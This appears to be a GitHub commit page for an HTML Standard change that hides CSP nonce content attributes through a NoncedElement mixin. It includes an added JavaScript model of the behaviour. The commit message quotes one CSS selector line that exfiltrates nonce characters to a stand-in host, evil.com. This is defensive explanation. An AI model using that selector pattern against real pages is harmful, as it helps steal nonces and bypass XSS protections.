Hide nonce content attribute values
Some [recent attacks on CSP][1] rely on the ability to exfiltrate
nonce data via various mechanisms that can read content attributes.
CSS selectors are the best example: through clever use of
prefix/postfix text-matching selectors, values can be sent out to an
attacker's server for reuse (e.g.,
`script[nonce=a] { background: url("https://evil.com/nonce?a");}`).

This patch mitigates the risk of this class of attack by hiding the
nonce value from elements' content attributes by moving the `nonce`
attributes into a new `NoncedElement` interface mixin, which is
included into `HTMLElement`. That mixin defines the following
behaviors for the `nonce` content attribute:

1.  When the `nonce` content attribute is set or changed, its new
    value is copied into a `[[CryptographicNonce]]` slot on the
    element.

2.  When a `NoncedElement` is inserted into a document which was
    delivered with a `Content-Security-Policy` header, the `nonce`
    content attribute is cleared out.

The `nonce` IDL attribute getter and setter now operate on the
`[[CryptographicNonce]]` slot's value rather than reflecting the
content attribute, meaning that the nonce value remains exposed
to script, but is opaque to non-script side-channels.

Likewise, the `[[CryptographicNonce]]` slot's value is used when
populating a request's cryptographic nonce metadata in order to
deliver the nonce to CSP for validation.

Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding

Closes whatwg#2369.

[1]: https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
mikewest authored and Alice Boxhall committed Jan 7, 2019
1 parent d9eecce commit a075c68
Showing 1 changed file with 97 additions and 56 deletions.
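The two behaviours the commit message attributes to the `NoncedElement` mixin can be modelled outside a browser. The block below is an added example, not code from the HTML Standard or from this commit: it uses its own simplified `ModelDocument` and `NoncedElement` classes (no real DOM tree, no CSP header parsing, and "cleared out" is modelled as setting the content attribute to the empty string), together with a minimal attribute-selector matcher, so the difference between what script sees through the IDL attribute and what a stylesheet can match against the content attribute is observable on a constructed nonce.

```javascript
// Added example (not code from the HTML Standard or from this commit): a
// stand-alone model of the two NoncedElement behaviours the commit describes,
// plus a simplified CSS attribute-selector matcher. Class and function names
// are assumptions of this model, not spec identifiers.

class ModelDocument {
  constructor({ headerDeliveredCSP }) {
    this.headerDeliveredCSP = headerDeliveredCSP; // true if a CSP header was sent
    this.children = [];
  }
  append(element) {
    this.children.push(element);
    element.onInserted(this); // models "inserted into a document"
  }
}

class NoncedElement {
  constructor(tagName) {
    this.tagName = tagName;
    this.contentAttributes = new Map(); // what CSS selectors can match against
    this.cryptographicNonce = "";       // models the [[CryptographicNonce]] slot
  }

  // Content attribute API. Behaviour 1: a set or changed `nonce` content
  // attribute is copied into the slot.
  setAttribute(name, value) {
    this.contentAttributes.set(name, String(value));
    if (name === "nonce") this.cryptographicNonce = String(value);
  }
  getAttribute(name) {
    return this.contentAttributes.has(name) ? this.contentAttributes.get(name) : null;
  }

  // IDL attribute: reads and writes the slot, not the content attribute.
  get nonce() { return this.cryptographicNonce; }
  set nonce(value) { this.cryptographicNonce = String(value); }

  // Behaviour 2: on insertion into a document delivered with a CSP header the
  // content attribute is cleared (modelled here as setting it to "").
  onInserted(doc) {
    if (doc.headerDeliveredCSP && this.contentAttributes.has("nonce")) {
      this.contentAttributes.set("nonce", "");
    }
  }
}

// The value CSP validation receives: the request's cryptographic nonce metadata
// is populated from the slot, so clearing the content attribute does not break
// nonce checks.
function requestNonceMetadata(element) {
  return element.cryptographicNonce;
}

// Simplified CSS attribute-selector matching over content attributes:
// [name=v], [name^=v], [name$=v], [name*=v]. As in Selectors, the ^= $= *=
// forms never match when v is the empty string.
function attributeSelectorMatches(element, name, operator, value) {
  const actual = element.getAttribute(name);
  if (actual === null) return false;
  switch (operator) {
    case "=":  return actual === value;
    case "^=": return value !== "" && actual.startsWith(value);
    case "$=": return value !== "" && actual.endsWith(value);
    case "*=": return value !== "" && actual.includes(value);
    default:   throw new Error(`unsupported operator ${operator}`);
  }
}

// Builds a <script nonce="..."> element, inserts it into a document, and
// returns what each consumer observes afterwards.
function observeNonce(nonceValue, headerDeliveredCSP) {
  const doc = new ModelDocument({ headerDeliveredCSP });
  const script = new NoncedElement("script");
  script.setAttribute("nonce", nonceValue);
  doc.append(script);
  return {
    idlNonce: script.nonce,                          // visible to script
    contentAttribute: script.getAttribute("nonce"),  // visible to selectors
    cspSeesNonce: requestNonceMetadata(script),
    prefixSelectorMatches: attributeSelectorMatches(script, "nonce", "^=", nonceValue[0]),
  };
}

// Constructed sample nonce; a real one is random per response.
const withCSP = observeNonce("a1b2c3", true);
const withoutCSP = observeNonce("a1b2c3", false);
console.log({ withCSP, withoutCSP });
```

With a header-delivered CSP the element's `nonce` IDL attribute and the request metadata still carry the value, while `getAttribute("nonce")` is empty and the prefix selector no longer matches; without the header the content attribute stays readable, which is the case the commit's second behaviour deliberately leaves untouched.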

0 comments on commit a075c68

Please sign in to comment.